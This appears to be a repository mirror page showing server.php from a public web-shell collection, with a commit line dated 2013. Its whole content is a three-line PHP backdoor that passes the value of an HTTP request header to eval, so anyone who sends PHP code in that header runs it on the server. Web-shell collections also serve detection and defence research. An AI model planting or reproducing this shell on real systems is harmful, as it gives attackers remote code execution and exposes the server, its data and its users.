1
0
mirror of https://github.com/tennc/webshell.git synced 2025-12-06 04:41:28 +00:00
Files
webshell/php/php-sh/server.php
tennc df6d55ad4f update
php shell and jsp shell
2013-09-13 10:44:57 +08:00

4 lines
36 B
PHP

<?php
eval(getenv('HTTP_CODE'));
?>